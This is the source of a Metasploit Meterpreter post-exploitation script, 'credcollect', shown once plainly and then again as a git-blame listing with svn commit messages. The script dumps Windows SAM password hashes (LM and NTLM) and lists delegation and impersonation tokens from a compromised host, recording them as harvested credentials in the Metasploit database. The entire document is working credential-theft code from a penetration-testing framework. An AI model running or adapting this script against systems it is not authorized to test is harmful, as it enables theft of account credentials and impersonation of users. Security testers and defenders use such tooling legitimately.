metasploit-framework/scripts/meterpreter/credcollect.rb

# $Id$
# credcollect - tebo[at]attackresearch.com

opts = Rex::Parser::Arguments.new(
	"-h" => [ false,"Help menu." ]
)

opts.parse(args) { |opt, idx, val|
	case opt
	when "-h"
		print_line("CredCollect -- harvest credentials found on the host and store them in the database")
		print_line("USAGE: run credcollect")
		print_line(opts.usage)
		raise Rex::Script::Completed
	end
}

# No sense trying to grab creds if we don't have any place to put them
if !client.framework.db.active
	raise RuntimeError, "Database not connected. Run db_connect first."
end


# Make sure we're rockin Priv and Incognito
client.core.use("priv") if not client.respond_to?("priv")
client.core.use("incognito") if not client.respond_to?("incognito")

# It wasn't me mom! Stinko did it!
hashes = client.priv.sam_hashes

# Target infos for the db record
addr = client.sock.peerhost
client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)

# Record hashes to the running db instance
hashes.each do |hash|
	data = {}
	data[:host]  = addr
	data[:proto] = 'smb'
	data[:user]  = hash.user_name
	data[:hash]  = hash.lanman + ":" + hash.ntlm
	data[:target_host] = addr
	data[:hash_string] = hash.hash_string

	client.framework.db.report_auth_info(data)
end

# Record user tokens
tokens = client.incognito.incognito_list_tokens(0)
raise Rex::Script::Completed if not tokens

# Meh, tokens come to us as a formatted string
(tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
	data = {}
	data[:host]      = addr
	data[:proto]     = 'smb'
	data[:token]     = token
	data[:target_host] = addr

	client.framework.db.report_auth_info(data)
end
keywords git-svn-id: file:///home/svn/framework3/trunk@7276 4d416f70-5f16-0410-b530-b9f4589650da 2009-10-26 15:14:28 +00:00			`# $Id$`
Adds the credcollect plugin and script from tebo git-svn-id: file:///home/svn/framework3/trunk@6410 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 07:44:44 +00:00			`# credcollect - tebo[at]attackresearch.com`

print_status -> print_line in usage git-svn-id: file:///home/svn/framework3/trunk@7361 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-05 00:38:05 +00:00			`opts = Rex::Parser::Arguments.new(`
add -h to credcollect git-svn-id: file:///home/svn/framework3/trunk@7255 4d416f70-5f16-0410-b530-b9f4589650da 2009-10-25 19:52:40 +00:00			`"-h" => [ false,"Help menu." ]`
			`)`

print_status -> print_line in usage git-svn-id: file:///home/svn/framework3/trunk@7361 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-05 00:38:05 +00:00			`opts.parse(args) { \|opt, idx, val\|`
add -h to credcollect git-svn-id: file:///home/svn/framework3/trunk@7255 4d416f70-5f16-0410-b530-b9f4589650da 2009-10-25 19:52:40 +00:00			`case opt`
			`when "-h"`
			`print_line("CredCollect -- harvest credentials found on the host and store them in the database")`
			`print_line("USAGE: run credcollect")`
print_status -> print_line in usage git-svn-id: file:///home/svn/framework3/trunk@7361 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-05 00:38:05 +00:00			`print_line(opts.usage)`
Fix bad uses of puts() and add raise Rex::Script::Completed where appropriate. These still need a major overhaul to fix tab indents and other problems git-svn-id: file:///home/svn/framework3/trunk@7258 4d416f70-5f16-0410-b530-b9f4589650da 2009-10-25 20:57:23 +00:00			`raise Rex::Script::Completed`
add -h to credcollect git-svn-id: file:///home/svn/framework3/trunk@7255 4d416f70-5f16-0410-b530-b9f4589650da 2009-10-25 19:52:40 +00:00			`end`
			`}`

			`# No sense trying to grab creds if we don't have any place to put them`
			`if !client.framework.db.active`
Handle the case of incognito returning an empty token list git-svn-id: file:///home/svn/framework3/trunk@8005 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-28 14:38:25 +00:00			`raise RuntimeError, "Database not connected. Run db_connect first."`
add -h to credcollect git-svn-id: file:///home/svn/framework3/trunk@7255 4d416f70-5f16-0410-b530-b9f4589650da 2009-10-25 19:52:40 +00:00			`end`


Adds the credcollect plugin and script from tebo git-svn-id: file:///home/svn/framework3/trunk@6410 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 07:44:44 +00:00			`# Make sure we're rockin Priv and Incognito`
switch use of extensions to client.respond_to git-svn-id: file:///home/svn/framework3/trunk@9032 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-07 16:03:22 +00:00			`client.core.use("priv") if not client.respond_to?("priv")`
			`client.core.use("incognito") if not client.respond_to?("incognito")`
Adds the credcollect plugin and script from tebo git-svn-id: file:///home/svn/framework3/trunk@6410 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 07:44:44 +00:00
			`# It wasn't me mom! Stinko did it!`
			`hashes = client.priv.sam_hashes`

			`# Target infos for the db record`
			`addr = client.sock.peerhost`
don't wait on the database when reporting hashes git-svn-id: file:///home/svn/framework3/trunk@9112 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-20 03:10:48 +00:00			`client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)`
update to use the new api git-svn-id: file:///home/svn/framework3/trunk@8208 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-22 23:53:12 +00:00
			`# Record hashes to the running db instance`
			`hashes.each do \|hash\|`
			`data = {}`
don't wait on the database when reporting hashes git-svn-id: file:///home/svn/framework3/trunk@9112 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-20 03:10:48 +00:00			`data[:host] = addr`
update to use the new api git-svn-id: file:///home/svn/framework3/trunk@8208 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-22 23:53:12 +00:00			`data[:proto] = 'smb'`
			`data[:user] = hash.user_name`
			`data[:hash] = hash.lanman + ":" + hash.ntlm`
don't wait on the database when reporting hashes git-svn-id: file:///home/svn/framework3/trunk@9112 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-20 03:10:48 +00:00			`data[:target_host] = addr`
update to use the new api git-svn-id: file:///home/svn/framework3/trunk@8208 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-22 23:53:12 +00:00			`data[:hash_string] = hash.hash_string`

			`client.framework.db.report_auth_info(data)`
Adds the credcollect plugin and script from tebo git-svn-id: file:///home/svn/framework3/trunk@6410 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 07:44:44 +00:00			`end`

			`# Record user tokens`
Handle the case of incognito returning an empty token list git-svn-id: file:///home/svn/framework3/trunk@8005 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-28 14:38:25 +00:00			`tokens = client.incognito.incognito_list_tokens(0)`
			`raise Rex::Script::Completed if not tokens`

Adds the credcollect plugin and script from tebo git-svn-id: file:///home/svn/framework3/trunk@6410 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 07:44:44 +00:00			`# Meh, tokens come to us as a formatted string`
update to use the new api git-svn-id: file:///home/svn/framework3/trunk@8208 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-22 23:53:12 +00:00			`(tokens["delegation"] + tokens["impersonation"]).split("\n").each do \|token\|`
			`data = {}`
don't wait on the database when reporting hashes git-svn-id: file:///home/svn/framework3/trunk@9112 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-20 03:10:48 +00:00			`data[:host] = addr`
update to use the new api git-svn-id: file:///home/svn/framework3/trunk@8208 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-22 23:53:12 +00:00			`data[:proto] = 'smb'`
			`data[:token] = token`
don't wait on the database when reporting hashes git-svn-id: file:///home/svn/framework3/trunk@9112 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-20 03:10:48 +00:00			`data[:target_host] = addr`
update to use the new api git-svn-id: file:///home/svn/framework3/trunk@8208 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-22 23:53:12 +00:00
			`client.framework.db.report_auth_info(data)`
Adds the credcollect plugin and script from tebo git-svn-id: file:///home/svn/framework3/trunk@6410 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 07:44:44 +00:00			`end`